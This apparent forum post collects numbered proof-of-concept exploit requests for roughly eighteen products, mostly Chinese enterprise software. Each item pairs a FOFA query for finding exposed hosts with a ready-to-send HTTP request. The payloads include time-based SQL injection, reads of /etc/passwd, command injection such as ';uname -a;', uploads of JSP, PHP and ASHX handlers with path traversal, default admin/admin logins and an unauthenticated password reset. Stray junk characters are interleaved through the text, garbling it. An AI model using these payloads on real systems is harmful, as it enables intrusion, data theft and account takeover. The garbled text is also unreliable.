5 t2 @ Q9 b' e: J186. F-logic DataCube3 SQL注入3 I9 `8 @) L2 i8 m' y0 J
CVE-2024-31750& {6 t; c p* A" @
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
! ?: z1 n' c B3 ?! o4 z8 hFOFA:title=="DataCube3"
* g4 F7 A- ?' Y% p1 p8 R3 oPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1
, i. s* D# t# V( e( @2 hHost: your-ip
, [4 d" G/ m4 Z! f+ }% PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
, J; W2 J) {' a; e; J2 v- A# _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8# Y c+ t Z6 U [
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 V5 q" T! Y8 T0 R. j
Accept-Encoding: gzip, deflate
" t7 } |, D/ u( ^9 J- iConnection: close
% W8 X% X# e. Q, h: y+ J& TContent-Type: application/x-www-form-urlencoded
8 J( y6 v' q4 X5 ~' c7 x7 Z6 r b$ L% D/ k8 r) c: T8 t
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450- M7 ?- m. f" Y7 W. U. L
6 s2 @8 }# b$ G/ \
/ j2 _0 j9 q% @& A
187. Mura CMS processAsyncObject SQL注入
) J4 u) h& S# p2 k9 w4 X3 ~1 ~ d4 Y6 ~CVE-2024-32640
$ N1 B* Q$ y9 O; ?4 pFOFA:"Mura CMS"1 @! j# |- t; C1 U1 b, E
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
; f h8 X. f1 BHost: your-ip
K" `: h# U" n' s- ?Content-Type: application/x-www-form-urlencoded
8 i# B) x1 @4 \( m2 L
% ?; S. i2 y# m K" i7 a3 }$ P% ^' @" _. E1 Y( s3 J9 O; Z/ p
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1# |: S8 [6 h' O1 e2 b
, A- v: ^# y( G) l2 R4 I& G' t' N
( h0 @% {2 K* B- l4 h4 y188. 叁体-佳会视频会议 attachment 任意文件读取5 V) W4 r' `: m4 w$ I: ~$ d+ L$ N
version <= 3.9.7
t. E; |0 j) D6 s- O; {) MFOFA:body="/system/get_rtc_user_defined_info?site_id"9 ^- I# t6 q3 U0 z
GET /attachment?file=/etc/passwd HTTP/1.10 E' b( o7 K4 ~6 |
Host: your-ip
6 t4 G. S% t5 y' m8 h) WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36, I, f5 K. Z3 ~" G8 z3 ?% T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" d8 F X1 ?- l. `& e7 gAccept-Encoding: gzip, deflate
" Q/ n+ ^( r3 ^7 y1 U# X1 v7 dAccept-Language: zh-CN,zh;q=0.9,en;q=0.80 U. i! C# r3 A2 l( i
Connection: close
8 ^: E4 U7 n4 j" ~. V. S- w
1 C% O7 I" Z/ H( r# J/ {1 M3 T5 S% K
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
1 P2 d0 x+ |/ N' C, `FOFA:app="LANWON-临床浏览系统"0 a& A+ b/ z6 o* u
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
D* x* Q% }7 C8 ZHost: your-ip. |6 U. ~# V. F$ p& V
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
" {. o; x. g$ S0 B, i3 }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: g) I& I& s2 @& L' [1 _Accept-Encoding: gzip, deflate) ]7 L# A& x, T
Accept-Language: zh-CN,zh;q=0.9
$ n) m# `% H9 K7 ?Connection: close
I( e/ _/ n# C" \. s9 f: u0 t. u$ x+ V
( U$ M+ z4 H/ V, c. R3 C190. 短视频矩阵营销系统 poihuoqu 任意文件读取
4 X9 R _) F9 j- [1 x9 P/ ]FOFA:title=="短视频矩阵营销系统"
5 P* L. A7 A: H- x) VPOST /index.php/admin/Userinfo/poihuoqu HTTP/2! |. t9 J: a7 Z6 k3 Z
Host: your-ip
/ Z$ v. S/ R4 B( GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
; ~1 [3 w- l5 u0 O+ C: OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.97 a2 t) F, X. ~& C0 U- ^! A
Content-Type: application/x-www-form-urlencoded
9 R6 V! F5 \+ pAccept-Encoding: gzip, deflate
$ r8 A2 i6 c! f& o& g1 uAccept-Language: zh-CN,zh;q=0.9
. W2 E( T" w( H, q! ]; W5 o# L. r6 ~) S; \6 Q$ o, _& |; @0 M! l
poi=file:///etc/passwd" Q3 j0 H1 t/ T2 b
0 Y3 p$ k( N9 ]) L
. [/ [0 N8 d. I% M" ~0 J
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入" \2 v2 v1 ?( b- i, v/ W- }# \
FOFA:body="/CDGServer3/index.jsp"
' j h7 ?* X& f' M$ ?4 w2 O' ^% }3 rPOST /CDGServer3/js/../NavigationAjax HTTP/1.1
$ B5 L5 t* i* n2 E; y, g& F7 CHost: your-ip
9 V! o+ }4 U+ `& O# f0 D* GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, b! }. Y' H7 W+ \: MContent-Type: application/x-www-form-urlencoded o7 J/ n2 q; W0 R
- I6 V! R! Q1 q) Z2 l5 d' s- V' Z( o) V$ c
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
+ u% ]. m* E O4 b+ N& j- Y) O4 X L! b$ |
$ T- q! D! b; e" t' y/ E! W192. 富通天下外贸ERP UploadEmailAttr 任意文件上传 j8 @- C$ w+ k/ _% `! h
FOFA:title="用户登录_富通天下外贸ERP"
- X. R) ~% G$ n4 {' ^& P+ j! m' SPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1( ]7 M& O; s. o4 o6 c0 V* Y
Host: your-ip- }' n; P8 \) R3 ], V0 N P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
) a+ i$ G# g1 vContent-Type: application/x-www-form-urlencoded m2 f1 S: E( K R. @& l Q) z
% E9 @8 V# j- v$ x" h- F& ~! f, ?2 ^/ W+ h4 u. _- \* d
<% @ webhandler language="C#" class="AverageHandler" %>; d7 J1 w3 Z9 }( H; O1 w
using System;
! Q1 o$ i) K! v& u! ousing System.Web;
' g4 k6 i" [8 r* B7 jpublic class AverageHandler : IHttpHandler
' l4 L3 V8 ? l5 M{: Z# O5 J7 S+ h4 ?# M& K2 N8 m
public bool IsReusable, R- g" f6 v4 m+ q. Q
{ get { return true; } }% i) ~/ f- Q5 `1 y$ W0 n6 E
public void ProcessRequest(HttpContext ctx) v3 s: O; A, C
{5 x1 w3 F M0 I3 F5 Z: ^4 ?
ctx.Response.Write("test");
# K4 f) U" Q/ n3 U}) f. F8 [6 b9 t" O6 l- V2 R7 h
}+ c. P$ q' i" E5 g) ]' t
}2 J. N0 N! r; j5 L" R/ O4 x/ U0 g9 `, q% m4 F
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行6 F! p( a& z# A+ N0 P7 F6 B) c: n
FOFA:body="山石云鉴主机安全管理系统"
/ ]3 {) w* T2 bGET /master/ajaxActions/getTokenAction.php HTTP/1.1
, S' o, @8 P8 m* N* ?Host:
+ i. N# ?; a3 l% uCookie: PHPSESSID=2333333333333;1 g& K n* H/ o
Content-Type: application/x-www-form-urlencoded
" f. M$ o6 V w! `) d: wUser-Agent: Mozilla/5.0
9 y/ a o' ?7 S! P, V) k0 N9 r6 m) Q/ f8 h, r" f P
* p) }4 g3 k; S g6 J
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1( y4 j! {1 s" F5 k# t( i
Host:% q. Z/ I5 p) K7 K, y; u8 ]
User-Agent: Mozilla/5.04 q" a2 d6 G; `+ w5 W+ I
Accept-Encoding: gzip, deflate
, l7 t5 R$ }& O& oAccept: */*
9 ^; U0 t( v; V( x0 L/ J3 n- eConnection: close
Z) m$ } f5 E3 {2 {, S jCookie: PHPSESSID=2333333333333;5 @; H" v& I. w9 b* ?; e
Content-Type: application/x-www-form-urlencoded
/ Z. r8 b5 c" vContent-Length: 84
( D/ k% E' v j7 Y( r* Z
! v- ?8 J# S, H; B4 y8 wparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
. T5 p; n* j E* b1 B* e k! N' p; [: R$ M; [' g
' U, d; c9 j* y( j" p/ J- k# h1 J, j _GET /master/img/config HTTP/1.1
) i5 |- c. I1 N# M: ^" k4 J, x: uHost:
+ h0 U" u" u: A. Y @User-Agent: Mozilla/5.0/ U5 W5 @8 f7 J9 V6 Y0 O% Z
7 G7 F, | \( c4 F2 g$ ^. a5 P& ~( R8 F& f1 r* Z. H* T" L, ]
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传& [1 F. Z0 f8 f' S( `/ \( ~) Z
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
5 I3 f, U, H. M; W4 H3 I8 [
; q# A! V5 n$ oPOST /servlet/uploadAttachmentServlet HTTP/1.1
4 \! t. v4 u. \- @) m8 {$ w4 ZHost: host& O% M. i- J! B7 A$ r! i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
! Y6 k0 ^# j! q6 {! @" dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8& v$ S2 u/ q; `$ N0 m
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 |! H8 ~2 b- I$ Y) [3 U
Accept-Encoding: gzip, deflate
& f9 Z* F* D4 F B0 I k T1 tConnection: close4 V0 g7 ]& ` S8 w
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk! k* Y$ @3 I0 v6 z, {: p E
------WebKitFormBoundaryKNt0t4vBe8cX9rZk; T( E' Q- [5 `% h
, f. H8 u, E" C5 W7 {
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
' b+ y0 N1 H$ B# [: p& `& [Content-Type: text/plain
6 D6 e3 r5 h; U<% out.println("hello");%>9 w" Z+ p( i$ a
------WebKitFormBoundaryKNt0t4vBe8cX9rZk* G" u: W7 w. d1 V9 x+ M
Content-Disposition: form-data; name="json"
, i, T8 ~, }3 i3 R" ~ {"iq":{"query":{"UpdateType":"mail"}}}- y0 G: {$ t S# k6 T4 X& i
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
. q0 \$ M" b; i* ]3 ?9 j3 f+ H( x
# ]/ N" ^( L& g/ B* m$ n; P' G$ R) K1 {2 @- x& j
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
6 d ]0 c0 t( G0 @& dFOFA:title=="飞鱼星企业级智能上网行为管理系统+ T1 ^+ J& D; }% H( F$ {: @
POST /send_order.cgi?parameter=operation HTTP/1.1
# J/ P3 m( f( `; D: BHost: 127.0.0.18 c; O3 m% b! x+ ]1 [( e8 w n
Pragma: no-cache9 S, Y& u2 I/ V) s1 U! r3 _
Cache-Control: no-cache
! U, ~. z4 `0 T: p/ AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.362 F c3 M+ a( |0 q" B5 S
Accept: */*
- H2 E# l; ] ^" x6 R4 W5 ]Accept-Encoding: gzip, deflate& D# D3 e4 l. k9 d6 d
Accept-Language: zh-CN,zh;q=0.9
( `/ t$ _5 m' [9 a& I' fConnection: close
; g3 w3 ]9 X% [/ z; I4 ]" g( [Content-Type: application/x-www-form-urlencoded, R; }" R% ^6 `; c. ]+ X7 d
Content-Length: 681 B4 J9 j( _4 |( m3 E5 l) k
6 Y% x. g x0 y5 U{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
8 k4 j9 q" N, }& V y' J/ K4 ?2 S9 F+ f2 q" M( p
7 j& J) D/ W4 E! \4 v1 p: \/ k4 Y196. 河南省风速科技统一认证平台密码重置
# H# p* ?5 @( {* v% H3 bFOFA:body="/cas/themes/zbvc/js/jquery.min.js"! `2 W* A* ]' E/ k' Q4 }
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
& `2 T0 B1 [" X# X- ?User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36# p) [! l$ x, N- O7 g' ?
Content-Type: application/json;charset=UTF-8
( M' i2 M. R8 H) TX-Requested-With: XMLHttpRequest
- A+ i& g( R$ S( f8 C3 `Host:
" s& p# F/ V, @9 YAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
w0 x" Y A) D! S/ f/ _Content-Length: 454 X5 Z4 B! F+ ~" ^, d; [' q
Connection: close% R& G+ n# l7 y; Q9 \5 C$ [
2 `# w. C( s o/ T2 b6 k) V
{"xgh":"test","newPass":"test666","email":""} i( Y K2 n! T; K5 ^* T
. _# r0 W& @" [ W! w9 Y N, `) m! O$ p" x$ P( z8 Y4 z
& b" r' G2 Z3 g% _$ N5 k5 j197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
% I! j/ ^. Q- ~$ ?3 [ `% u8 o/ W" _FOFA:app="浙大恩特客户资源管理系统"
: g8 O: [# C7 W' t* M, z6 e0 dGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
, `- ~ y# n, c0 _3 s" UHost:4 A8 Y4 L% H3 m- J' M4 R' r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36) J6 c4 C ^2 M% f
Accept-Encoding: gzip, deflate
2 A6 i8 A6 x* Z, @5 f, }( e& ?Connection: close J% }" S. r& `# f
* N3 ?& [1 \7 B5 `. [9 y* F, S- C. e" s) h8 h& z
( \; t: ]2 t5 Z
198. 阿里云盘 WebDAV 命令注入
- C) j1 z( N! F! f! ~8 C# JCVE-2024-29640! d1 U! o q- e" I
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
/ N7 M% J1 y c8 @6 {Cookie: sysauth=41273cb2cffef0bb5d0653592624cf647 }" |8 X3 I: d& I
Accept: */*
& P& g1 e7 P8 e# s2 YAccept-Encoding: gzip, deflate7 s+ ^8 K7 k, A+ T
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
7 j; B/ e9 P6 F$ R& TConnection: close
6 [$ \/ Q- J# t6 j( G& A, A$ v% g& j1 q) Z& `' E" \
; p g T5 X+ {3 M: U+ x# F2 `
199. cockpit系统assetsmanager_upload接口 文件上传5 H* a. w! Q4 @# b
( Z- r& {! B4 Y6 o4 H7 ^1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
3 Q0 q2 g' R/ m3 ^8 X. q. i$ M& cGET /auth/login?to=/ HTTP/1.1
& a. I. w& n- y1 E/ h4 q% p1 k @- |/ i5 X8 h, x5 j
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
: x- D5 ^" ?$ D, B
1 f. x8 q: E& C+ [, N/ s2.使用刚才上一步获取到的jwt获取cookie:
0 _' i" E7 [7 u4 z
, I$ H. f% V+ c& k+ g+ ]+ aPOST /auth/check HTTP/1.1
& w6 _* h' N# X7 S3 Q8 h5 P+ j8 s. pContent-Type: application/json- u* {9 r, k+ z
$ ]3 s; ^, Q/ i% T. [{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}: B$ i' b! [7 \5 \8 j
1 b0 A% q# U& _' b响应:200,返回值:/ r% X- q$ \3 k$ a* v; Y; N
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
: y5 A) g6 f. I' S- O0 V2 gFofa:title="Authenticate Please!" g, n6 F' B# R7 L( {2 ` R9 I
POST /assetsmanager/upload HTTP/1.1
7 ~ R- O( z% ?$ w7 M, H5 mContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
: R, Q7 ?4 T1 v2 _5 rCookie: mysession=95524f01e238bf51bb60d77ede3bea92
$ Q0 ^6 ?0 @" V" M
% q- o' a% \! t1 V6 |1 r-----------------------------36D28FBc36bd6feE7Fb3
3 _2 e- Y) d% j x8 ^& @& QContent-Disposition: form-data; name="files[]"; filename="tttt.php"' v8 X! R9 k/ }! E7 z9 K
Content-Type: text/php
7 _* b6 p- X4 I7 F0 `( O$ b9 P8 H; \- ?! e+ D' ^" q
<?php echo "tttt";unlink(__FILE__);?>
0 }% a2 h# d. B-----------------------------36D28FBc36bd6feE7Fb3
9 O/ s I2 C- @: OContent-Disposition: form-data; name="folder" i6 f* s1 k; a: r4 J& D2 Z" M: V- T
, X1 \4 \. ?! ?2 k! C% l5 O: G
-----------------------------36D28FBc36bd6feE7Fb3--
+ v+ e$ j$ G k. R( o4 c6 K4 U9 x+ V) |& O1 i2 n2 i
% ]5 S$ W/ F7 I
/storage/uploads/tttt.php
1 D$ s% F& x. ?7 f% U, P+ g$ A4 Y
; F) y7 c6 b3 ?200. SeaCMS海洋影视管理系统dmku SQL注入
2 A7 l) s+ Y' A4 w# s G" b7 EFOFA:app="海洋CMS"6 W, Q/ ]# G2 e3 e
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
2 r' s5 q5 D" K" Y0 \5 x2 _Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
6 { `- e7 S- G# AUpgrade-Insecure-Requests: 1
- t4 O7 D) d+ Q! y9 p, h3 `Cache-Control: max-age=0
, s& F! R$ V# GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 F. S9 i; M) G2 B
Accept-Encoding: gzip, deflate9 ]! @- [4 ^; g8 C
Accept-Language: zh-CN,zh;q=0.9
; Z! x! B, o! c
/ w+ b- G) v1 c% @% k! X: n) |% u8 y! L2 D; }/ r, Y( v1 {
201. 方正全媒体新闻采编系统 binary SQL注入: e T; V4 P$ t, X( U$ u- U& P9 u
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"( c- m4 ?8 g. P! b& [ j9 z
POST /newsedit/newsplan/task/binary.do HTTP/1.16 x6 j2 L' e( o% s0 Z; J: O
Content-Type: application/x-www-form-urlencoded8 R% ?4 J( I* W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 K; ~3 V- w# Q4 E4 r) d( c
Accept-Encoding: gzip, deflate
9 A8 o+ ^3 ]: A: |( rAccept-Language: zh-CN,zh;q=0.9- R' Z7 f D2 |* Y. T+ R3 V
Connection: close
6 N! K/ r/ L# W8 N
7 b* O1 j2 v' m. QTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
% q$ A9 F3 Z# h8 W) N8 _( l( W2 s F3 I1 q( X6 P
6 m! M/ x7 _ L$ r0 y202. 微擎系统 AccountEdit任意文件上传0 W* u/ C0 K. _* `+ S+ `6 f) E
FOFA:body="/Widgets/WidgetCollection/"
3 q& O* l5 [$ [* y8 M( m1 ~获取__VIEWSTATE和__EVENTVALIDATION值
7 E! n$ p" O% |2 SGET /User/AccountEdit.aspx HTTP/1.1
Y# Q$ {4 p; q% yHost: 滑板人之家; @- T" n1 c$ {7 w1 {2 e9 O }: G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
: F( \. q$ c) s' iContent-Length: 0
5 d% i5 Y9 {3 T6 \& Q
9 t" [1 q1 U, N& [' w( ^
( R- _% s# B2 l* ^+ M8 M. e8 s8 v3 q) \替换__VIEWSTATE和__EVENTVALIDATION值. t6 t7 s! ?1 {# Q: z) \2 z: G
POST /User/AccountEdit.aspx HTTP/1.1
, p3 p$ r+ ]$ J* {Accept-Encoding: gzip, deflate, br5 o2 d1 s9 G: x: m# b, e6 }4 U$ g
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687! x0 W+ L) u4 H$ Y. `
& U% {& C! [7 v& W0 ?- ^! u! x2 ^
-----------------------------786435874t38587593865736587346567358735687. i( {, ^5 M* b! @
Content-Disposition: form-data; name="__VIEWSTATE"
( @6 S) C; o2 t- a+ c" c* |9 }3 y+ t; ]! \8 D
__VIEWSTATE
# ^: }- n3 I0 f% A* P1 o j: n-----------------------------786435874t38587593865736587346567358735687
v9 _" D. R# U0 o B' WContent-Disposition: form-data; name="__EVENTVALIDATION"! ]8 }2 j% s- B! E3 m1 l# l
5 n+ _3 s6 m( l% A, A__EVENTVALIDATION- g* D7 R5 Y. [4 D/ U4 n! D6 {
-----------------------------786435874t38587593865736587346567358735687
" z8 B v8 T$ B* ~7 [2 }8 UContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"& W4 I; C& F- k( ]- P% M7 o0 s
Content-Type: text/plain
6 T0 N6 t* ]" [" v7 R; x( [' k. |; |# F5 `9 a1 a- _0 i
Hello World!
5 D- e# @: ~7 k% [: K& }( `9 D7 x-----------------------------786435874t38587593865736587346567358735687% N- G2 c o a" o( |
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"& \9 a( S) Y- F2 b2 T
9 H( I$ a2 |' u6 [! ^* I) ^上传图片
- ]9 n, a% b. G-----------------------------786435874t38587593865736587346567358735687) c; V ^& o9 `" v( A3 W; K
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"1 @ ?* n) Q, V
* Z. D+ a8 h8 U6 T( K
# ~! N( {5 E* m' o$ f
-----------------------------786435874t385875938657365873465673587356874 Q% W6 Z, G% m, G9 a* x
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail", c% K4 G5 |( h5 j' ^1 d
& C" r0 g9 Q+ }7 Y
) W: O* P7 K0 t* g- G. _
-----------------------------786435874t38587593865736587346567358735687--
4 G- n4 x5 ]/ l. }, j. u- K. E6 u
2 m! W1 A8 e; |, q1 X; C/ L& S
/_data/Uploads/1123.txt
2 v- Z8 z6 R! v2 }5 x# ]; U+ I* y
W+ |; L: d4 L! z203. 红海云EHR PtFjk 文件上传+ o- L o* r* m3 l2 u& F; z3 D7 Q
FOFA:body="RedseaPlatform"0 k v1 O" B0 @* o3 |
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.10 X8 [% n6 i1 N0 p
Host: x.x.x.x
8 \# K. |& d* a" b% t( ^. hAccept-Encoding: gzip' T/ V4 [' n. V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.156 r( S P$ [. I, h
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
3 C q Y- `/ j8 j0 ~6 \: ?! M# VContent-Length: 210
5 I4 K; F7 Z3 S- [" Q6 U+ @6 D/ h- ]! e( {' ]
9 e- [& G/ i. |* l6 i------WebKitFormBoundaryt7WbDl1tXogoZys4/ ~1 V( G, z0 |& p% ~( K7 @
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
* A# l( ^( d3 \- M/ y8 l q; t6 ~' sContent-Type:image/jpeg; R3 u* H- y A) W
2 q) U. U1 K& K
<% out.print("hello,eHR");%>
, G+ H+ A$ W0 E4 }& @2 W------WebKitFormBoundaryt7WbDl1tXogoZys4--
* H. V8 n. v1 _# b# g& a. O: M1 q& v% _( v Z8 W* G! O4 r" t
+ D+ E2 t1 h0 v V4 \+ j* B$ a
: Z( D7 j# G( G/ O& I: F' b/ n3 Z; r' i9 t8 E7 A4 R5 ]
3 Z3 r; m2 m) |, H% v$ r2 |2 l& ~& I. i3 T3 T
|
发表于 2024-6-5 14:31:29
收藏
支持
反对